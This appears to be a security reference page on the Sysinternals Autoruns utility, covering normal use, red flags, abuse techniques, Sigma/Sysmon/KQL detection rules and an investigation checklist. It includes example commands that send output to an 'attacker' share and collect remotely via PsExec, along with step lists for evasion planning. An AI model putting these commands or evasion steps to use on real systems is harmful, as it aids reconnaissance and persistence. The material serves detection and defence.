anavem.
A
Low RiskWindows
autoruns.exeEXECUTABLE

Sysinternals Autoruns - Windows Startup Analysis Tool [2026]

Autoruns is a Sysinternals tool for viewing and managing Windows startup programs. Legitimate diagnostic tool that can be used by attackers for persistence discovery and evasion.

3viewsLast verified: Jan 18, 2025

Risk Summary

## Risk Summary | Factor | Assessment | |--------|------------| | Detection Difficulty | Low | | Abuse Potential | Medium | | Prevalence | Common | | Risk Score | 35/100 | Autoruns is a legitimate Microsoft Sysinternals tool for startup management that can be abused for reconnaissance.

Overview

What is autoruns.exe?

Autoruns is a Microsoft Sysinternals utility that provides comprehensive visibility into all programs configured to run at system startup or login.

Key Characteristics

AttributeValue
File Nameautoruns.exe, autoruns64.exe, autorunsc.exe
DeveloperMicrosoft (Sysinternals)
Digital SignatureMicrosoft Corporation
Typical Size1-3 MB
TypeDiagnostic utility

Technical Details

PropertyDescription
Process TypeUser Application
PrivilegesAdministrator for full access
NetworkVirusTotal integration (optional)
VariantsGUI (autoruns.exe), CLI (autorunsc.exe)

Autoruns is widely used by IT professionals and security researchers for investigating persistence mechanisms.

Normal Behavior

Normal Behavior

Legitimate Usage Patterns

autoruns.exe  (GUI version)
autoruns64.exe  (64-bit GUI)
autorunsc.exe  (Command-line version)
autorunsc.exe -a * -c -h  (Export to CSV)

Expected Characteristics

AspectExpected Behavior
Parent Processexplorer.exe, cmd.exe
User ContextAdministrator
NetworkOptional VirusTotal lookups
Registry AccessExtensive (reads startup keys)

Command-Line Options

ParameterPurpose
-aSpecify autostart types
-cCSV output
-hHide Microsoft entries
-vVirusTotal check
-xXML output

Common Locations

C:\SysinternalsSuite\autoruns.exeC:\Tools\autoruns64.exeC:\Users\<user>\Downloads\autoruns.exe

Suspicious Indicators

Suspicious Indicators

Red Flags

IndicatorConcern LevelDescription
Renamed binaryMediumDifferent filename
Remote executionHighLaunched via PsExec
Automated collectionMediumScripted data gathering
Results exfiltrationHighOutput sent externally

Reconnaissance Patterns

# Suspicious usage patterns
autorunsc.exe -a * -c > \\\\attacker\\share\\autoruns.csv
autorunsc.exe -accepteula -a * -c -h | Out-File C:\Temp\autoruns.csv

Potential Abuse

ActivityConcern
Silent collectionGathering persistence info
Remote collectionMapping enterprise autoruns
Disabling entriesRemoving security software
Identifying gapsFinding persistence opportunities

Abuse Techniques

Abuse Techniques

Persistence Discovery

Reconnaissance Use:
1. Deploy autoruns to compromised system
2. Collect all autostart entries
3. Identify security software persistence
4. Find gaps for attacker persistence
5. Map environment startup configuration

Evasion Planning

Attacker Analysis:
1. Export autoruns data
2. Identify security software entries
3. Find least-monitored startup locations
4. Plan persistence that blends in
5. Avoid locations watched by security tools

Command-Line Collection

:: Silent collection
autorunsc.exe -accepteula -a * -c -h > autoruns.csv

:: Remote collection
for /f %h in (hosts.txt) do (
    psexec \\\\%h autorunsc.exe -accepteula -a * -c > \\\\%h-autoruns.csv
)

:: Delete security autoruns (malicious)
autoruns.exe  [Then manually disable entries]

Defense Evasion

TechniqueUse of Autoruns
Persistence DiscoveryFind where to persist
Security EvasionIdentify security autostart entries
Blending InFind busy locations to hide
CleanupRemove competitor malware

Detection Guidance

Detection Guidance

Sysmon Configuration

<RuleGroup name="Autoruns Monitoring" groupRelation="or">
  <ProcessCreate onmatch="include">
    <Image condition="contains">autoruns</Image>
    <Image condition="contains">autorunsc</Image>
  </ProcessCreate>
  <FileCreate onmatch="include">
    <TargetFilename condition="end with">.arn</TargetFilename>
  </FileCreate>
</RuleGroup>

Sigma Rule

title: Autoruns Execution Detection
status: experimental
logsource:
  product: windows
  category: process_creation
detection:
  selection:
    - Image|contains: 'autoruns'
    - OriginalFileName|contains: 'autoruns'
  condition: selection
  falsepositives:
    - IT administration
    - Security assessments
  level: low

KQL Query

DeviceProcessEvents
| where FileName contains "autoruns" or ProcessCommandLine contains "autorunsc"
| project Timestamp, DeviceName, FileName, ProcessCommandLine,
          AccountName, InitiatingProcessFileName

Remediation Steps

Remediation Steps

Context Assessment

Autoruns Usage Review:
- Generally legitimate tool
- Context determines threat level
- Review who ran it and why
- Check what was done with output

Investigation

# Find autoruns output files
Get-ChildItem -Path C:\ -Recurse -Include "*.arn","autoruns*.csv" -ErrorAction SilentlyContinue

# Check recent executions
Get-WinEvent -FilterHashtable @{LogName='Security';Id=4688} |
    Where-Object { $_.Properties[5].Value -like "*autoruns*" } |
    Select TimeCreated, @{N='CommandLine';E={$_.Properties[8].Value}}

Policy

ContextResponse
IT-initiatedNormal administration
Unknown sourceInvestigate thoroughly
Remote executionPossible reconnaissance
Repeated executionMonitor for pattern

Investigation Checklist

Investigation Checklist

Usage Context

  • Who executed Autoruns?
  • Was it IT/security initiated?
  • What was the business justification?
  • Was command-line version used?

Activity Analysis

  • What command-line parameters were used?
  • Was output saved to a file?
  • Where was output saved?
  • Was output transmitted anywhere?

Follow-up Activity

  • Were any autoruns entries modified?
  • Was security software affected?
  • What happened after Autoruns ran?
  • Is there evidence of persistence added?

Enterprise Scope

  • Was Autoruns run on multiple systems?
  • Is there evidence of remote execution?
  • Is this part of a larger campaign?

MITRE ATT&CK Techniques

T1518 - Software DiscoveryT1082 - System Information Discovery